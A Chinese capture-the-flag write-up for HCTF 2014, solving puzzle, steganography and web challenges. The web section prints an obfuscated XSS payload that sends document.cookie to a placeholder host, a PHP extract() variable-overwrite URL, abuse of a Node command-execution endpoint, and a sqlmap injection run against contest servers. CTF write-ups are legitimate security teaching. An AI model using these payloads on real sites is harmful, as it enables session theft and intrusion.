蓝冰 · 2014/11/29 16:47

丘比龙的最爱 10pt

传说,丘比龙是丘比特的弟弟,丘比龙是一只小爱神,虽然有两只翅膀,但因为吃多了,导致身体太胖,所以飞不起来~那么问题来了?!丘比龙吃什么食物吃多了变胖了

很明显了,百度一下答案是甜甜圈

nvshen 100pt

猫流大大发现一个女神,你能告诉我女神的名字么(名字即是flag) 下载zip后是一个疑似base64的密文,用base64解密后发现png图片头 后缀改为png

图片放到百度识图 得到名字

flag:爱新觉罗启星
复制代码

GIFT 100pt

打开网站 在注释处发现一个文件 index.php.bak 内容为

<?php
$flag=‘xxx';
extract($_GET);
if(isset($gift))
{
$content=trim(file_get_contents($flag));
if($gift==$content)
{
echo’hctf{...}';
}
else
{
echo’Oh..';
}
}
?>
复制代码

构造如下URL:

http://121.40.86.166:39099/index.php?gift=&flag=
复制代码

覆盖掉flag变量

flag: hctf{Awe3ome_Ex7ract!!!}
复制代码

Entry 200pt

57R9S980RNOS49973S757PQO9S80Q36P 听说丘比龙一口气能吃”13”个甜甜圈呢!

刚开始各种进制转换,后来注意道13这个数字,刚好密文处是13个字母,于是把字母转成 ASCII然后加13后转字符,然后插到原来的位置,最后cmd5解密

flag: Qoobee
复制代码

FIND 200pt

把图片下载下来用Stegsolve神器在随机图层发现二维码,把二维码修复一下 白色的改成黑色的 黑色的改成白色的 然后扫一下就出来flag了

flag{hctf_3xF$235#\x5e3}

IRC 300pt

进入官方IRC频道,挨个找人whois

命令 /whois xxx(昵称) 其中有几个人反弹了flag 提交几个后终于正确了

opensource 300pt

开源?闭源?

在robots.txt文件下发现 .git隐藏目录 根据git说明 得到分支文件

refs/heads/master
复制代码

下载后得到 hash值 e52b59bc730f13d999b1f2452ca3f689850ca0a3

然后进入e5/目录访问2b59bc730f13d999b1f2452ca3f689850ca0a3 文件 hash前二位目录 后32位文件名 详情可以去百度看一下 git的目录结构 依此类推 配合 (git cat-file -p 接40位hash )命令 读取项目文件 是当前网站的源代码 node.js

部分代码:

// view engine setup
app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'jade');app.use(favicon());
app.use(logger('dev'));
app.use(bodyParser.json());
app.use(bodyParser.urlencoded());
app.use(cookieParser());app.use('/', routes);
app.use('/ac6555bfe23f5fe7e98fdcc0cd5f2451', pangci);
—————————————————————————————-var express = require('express');
var router = express.Router();
var fs = require('fs');
var path = require('path');
var cp = require('child_process');router.get('/', function(req, res) {var data = path.normalize('/tmp/flag');if (req.param('pangci')) {cp.exec(secure(req.param('pangci')) + ' ' + data, function (err, stdout, stderr) {if (err) { res.end('Ohhhhh MY SWEET!!!YOOOOOO HURT ME!!') }var limit = stdout.split('\n').slice(0, 5).join('\n');res.end(limit);});} else {res.end('HEY MY SWEET!!! I LOVE YOOOOOOOO!!!');}});function secure (str) {return str.replace(/[^\d\-a-zA-Z ]/g, '');
}
复制代码

访问

/ac6555bfe23f5fe7e98fdcc0cd5f2451?pangci=wc
复制代码

返回

142   735 11507 /tmp/flag
复制代码

表示有142行

利用tail -n num 命令 一次读取5行

最后进行拼接得到 flag

FUCKME 350pt

打开网页各种语种,想到用词频分析进行解密,利用软件统计频率前26个字 用记事本或者脚本替换成26个英文字母 然后用下面这个网站进行解密

http://www.quipqiup.com/index.php

flag:hctf{enjoyyourselfinhctf}
复制代码

jianshu 400pt

这题有点坑,首先比较轻松的xss到了cookie,

<svg><scscriptript>window.locatioonn=“http://xxx.com/cookie.php?cookie=“%26%2343%3Bescape(document.cookie);</scscriptript></svg>
复制代码

然后cookie里确实有flag flag=NOT IN COOKIE尝试提交这个不对 然后在cookie.php进行修改 获取客户端的http头信息

Referer: http://121.41.37.11:25045/get.php?user=V1ew
X-Forwarded-For: 218.75.123.186
复制代码

伪造http头访问改url 还是没有发现cookie 然后据说不是xss 是sql注入 然后各种参数,各种注

然后最后的注入的点为;

http://121.41.37.11:25045/img.php?file=1*.jpg
复制代码

之前尝试了整个file参数发现注不了,其实是要注.jpg前面的值

sqlmap —level 6 —dbs
复制代码

跑出数据库

访问

http://121.41.37.11:25045/get.php?user=A1rB4s1C
复制代码

提示IP不对 用之前X到的IP进行伪造 最后返回flag

flag: hctf{Why_are_U_S0_DIA0?????}
复制代码

HCTF writeup(web)相关推荐

  1. php scrscriptipt,HCTF 2016 writeup——web篇

    做了5个web题,分享一下思路.. Level-1 1. 2099年的flag 打开链接,提示需要ios99才能得到flag,源码的注释中提示要POST,那么就修改User-Agent头为ios的头, ...

  2. CTF-练习平台 writeup web

    bugku Web WriteUp 刚刚接触ctf没多久,做ctf-练习平台上的题目,有些新的题目,在网上没有找到对应的writeup,所以做了之后就想自己写一个,也顺便理理自己的思路.(没有太多经验 ...

  3. 南京邮电大学网络攻防平台WriteUP——WEB(上)

    前言 南京邮电大学网络攻防平台(http://ctf.nuptsast.com/)是一个集合了WEB.MISC.密码学.PWN.逆向的一个CTF训练平台,对于初次涉及ctf小伙伴来说是非常不错的一个训 ...

  4. 攻防世界writeup——Web(持续更新)

    文章目录 ics-06(XCTF 4th-CyberEarth) NewsCenter( XCTF 4th-QCTF-2018) lottery(XCTF 4th-QCTF-2018) NaNNaNN ...

  5. BugkuCTF Writeup——Web

    文章目录 web2 计算器 web基础$_GET web基础$_POST *矛盾 web3 域名解析 你必须让他停下 *本地包含 *变量1 web5 头等舱 网站被黑 *管理员系统 web4 flag ...

  6. write-up web source

    题目: 打开网址查看源代码发现了一个假的flag,根据提示说只用Linux环境,猜测用kali解决 在kali中首先使用dirsearch命令扫描目录,命令如下: 得到结果: 发现.git泄露,于是利 ...

  7. 第11届极客大挑战writeup

    第11届极客大挑战writeup Web 朋友的学妹 EZwww 刘壮的黑页 Welcome EZgit 我是大黑客 ezbypass 知X堂的php教程 Re No RE no gain 我真不会写 ...

  8. OFPPT-CTF 2022 部分writeup

    OFPPT-CTF 2022 部分writeup OFPPT-CTF 2022 OFPPT-CTF 2022 部分writeup Web Logs easy web LFI library Choco ...

  9. WarGame系列之Natas(Web安全)通关指北(初级篇0-10)详细版

    *OverTheWire社区是一个提供wargame的网站,可以帮助安全爱好者以趣味的方式进行学习.练习安全知识. 本系列文章旨在记录笔者通关思路,其中解题思路也会参考借鉴网上已有文章,在此感谢相关作 ...

最新文章

  1. 说说数据库连接池工作原理和实现方案?
  2. 金泰联限量稳定虚拟主机赞助计划
  3. 删除online日志測试及ora-600 [4194]错误的处理
  4. 大数据旅游网站Hopper获新一轮1600万美元融资
  5. 什么是Sentinel?它能做什么
  6. 实际电压/流源模型及其等效分析
  7. java求1000内的水仙花数
  8. 个人自学ccna的资料+工大瑞普模拟器
  9. 【Level 08】U08 Positive Attitude L3 What a life
  10. MySQL/MariaDB Tips
  11. 生成不同尺寸dimen的xml文件以及文件夹
  12. epson r1900 清零软件_EPSON 1430 R1900 1500 R330 R1800 R2000 R230 打印机清零软件
  13. linux自动微信发信息,Linux下发送微信消息
  14. python 常用模块列表
  15. amd cpu排行_intel和AMD CPU性能排行
  16. matlab标定工具安装,标定工具(matlab仿真工具)
  17. 关于正月十六工作室更换新LOGO的通知
  18. 【致青春】奋斗迷茫的我们
  19. 现代企业管理的12个指南针
  20. 前端如何创建好看的简洁的蒙版弹窗

热门文章

  1. 增益和偏移的概念_2 理解与校准 ADC 系统的偏移和增益误差
  2. oracle8616,ORACLE11G-数据库备份恢复之RMAN全库备份恢复
  3. 数据上链——区块链相关概念
  4. 肖仰华谈知识图谱:知识将比数据更重要,得知识者得天下
  5. 2017-03-19第nn次考试
  6. 0725(016天 多态复习 java中级-抽象类01)
  7. 永恒之蓝勒索漏洞复现
  8. fbx 模型转换 export
  9. [转][TFS] 禁止默认允许多人签出和强制解除签入签出锁
  10. js前端double无法显示,long精度丢失,layUI数据表格